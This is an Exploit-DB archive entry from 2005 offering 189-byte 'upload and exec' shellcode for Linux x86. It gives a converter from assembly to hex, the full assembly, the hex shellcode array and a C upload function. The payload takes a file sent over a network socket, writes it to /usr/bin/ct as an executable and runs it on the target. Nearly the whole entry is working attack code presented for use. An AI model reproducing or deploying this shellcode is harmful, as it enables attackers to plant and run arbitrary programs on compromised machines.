linux/x86 upload & exec 189 bytes

2005-06-19T00:00:00
ID EDB-ID:13416
Type exploitdb
Reporter cybertronic
Modified 2005-06-19T00:00:00

Description

linux/x86 upload & exec 189 bytes. Shellcode exploit for lin_x86 platform

                                        
                                            UPLOAD & EXEC SHELLCODE

[1] converting asm to hex
[2] asm code
[3] hex output
[4] upload function

This is an 'upload and exec' shellcode for the x86 platform.
File has to be in executable format,
cool if you know the distribution of the target, otherwise
it is useless.

-cybertronic

[1]

/*
 * convert .s to shellcode typo/teso (typo@inferno.tusculum.edu)
 *
 * $ cat asm.s
 * .globl cbegin
 * .globl cend
 * cbegin:
 * "asm goes here"
 * cend:
 * $ gcc -Wall asm.s asm2hex.c -o out
 * $ ./out
 *
 */

#include

extern void cbegin();
extern void cend();

int
main ()
{
    int i = 0;
    int x = 0;
    char* buf = ( char* ) cbegin;

    printf ( "unsigned char shellcode[] =\n\"" );
    for ( ; ( *buf ) && ( buf < ( char* ) cend ); buf++ )
	{
		if ( i++ == 16 )
			i = 1;
		if ( i == 1 && x != 0 )
			printf ( "\"\n\"" );
		x = 1;
		printf ( "\\x%02x", ( unsigned char )* buf );
	}
	printf ( "\";\n" );
    return ( 0 );
}

[2]

# append to any bind shellcode
# gcc -Wall upload-exec.s asm2hex.c -o upload-exec
# cybertronic

.globl cbegin
.globl cend

cbegin:

	movl %eax,%ecx

	jmp getstr

start:

	popl %esi

	leal (%esi),%ebx
	xorl %eax,%eax
	movb %al,0x0b(%esi)

	pushl %esi
	pushl %ecx

	movb $0x05,%al
	movw $0x241,%cx
	movw $00777,%dx
	int  $0x80
	movl %eax,%edi
	popl %esi

read:

	movl %esi,%ebx
	movb $0x03,%al
	leal -200(%esp),%ecx
	movb $0x01,%dl
	int  $0x80

	cmpl $0xffffffff,%eax
	je end
	xorl %ecx,%ecx
	cmpl %eax,%ecx
	je continue

	leal -200(%esp),%ecx
	xorl %ebx,%ebx
	movl %edi,%ebx
	movl %eax,%edx
	movb $0x04,%al
	int  $0x80

	jmp read

continue:

	movb $0x06,%al
	movl %esi,%ebx
	int  $0x80
	movb $0x06,%al
	xorl %ebx,%ebx
	movl %edi,%ebx
	int  $0x80

	xorl %esi, %esi
	popl %esi
	movl %esi,0x0c(%esi)
	xorl %eax,%eax
	movl %eax,0x10(%esi)
	movb $0x0b,%al
	xchgl %esi,%ebx
	leal 0x0c(%ebx),%ecx
	leal 0x10(%ebx),%edx
	int $0x80

end:

	xorl %eax,%eax
	incl %eax
	int $0x80

getstr:

	call start
	.string "/usr/bin/ct"

cend:

[3]

/*
 * linux x86
 * 189 bytes upload & exec shellcode by cybertronic
 * cybertronic[at]gmx[dot]net
 *
 */

unsigned char shellcode[] =
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68\xc7\xc7\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0"
"\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xc1\xeb\x70\x5e\x8d\x1e"
"\x31\xc0\x88\x46\x0b\x56\x51\xb0\x05\x66\xb9\x41\x02\x66\xba\xff"
"\x01\xcd\x80\x89\xc7\x5e\x89\xf3\xb0\x03\x8d\x8c\x24\x38\xff\xff"
"\xff\xb2\x01\xcd\x80\x83\xf8\xff\x74\x3e\x31\xc9\x39\xc1\x74\x13"
"\x8d\x8c\x24\x38\xff\xff\xff\x31\xdb\x89\xfb\x89\xc2\xb0\x04\xcd"
"\x80\xeb\xd3\xb0\x06\x89\xf3\xcd\x80\xb0\x06\x31\xdb\x89\xfb\xcd"
"\x80\x31\xf6\x5e\x89\x76\x0c\x31\xc0\x89\x46\x10\xb0\x0b\x87\xf3"
"\x8d\x4b\x0c\x8d\x53\x10\xcd\x80\x31\xc0\x40\xcd\x80\xe8\x8b\xff"
"\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x63\x74";

[4]

int
upload ( char* ip )
{
	int s;
	int fd;
	char ch;
	struct stat st;

	s = conn ( ip );

	if ( ( fd = open ( "file", O_RDONLY ) ) == -1 )
		return ( 1 );
	fstat ( fd, &st );
	while ( st.st_size-- > 0 )
	{
		if ( read ( fd, &ch, 1 ) < 0 )
			return ( 1 );
		if ( write ( s, &ch, 1 ) < 0 )
			return ( 1 );
	}
	close ( fd );
	close ( s );
	return ( 0 );
}

# milw0rm.com [2005-06-19]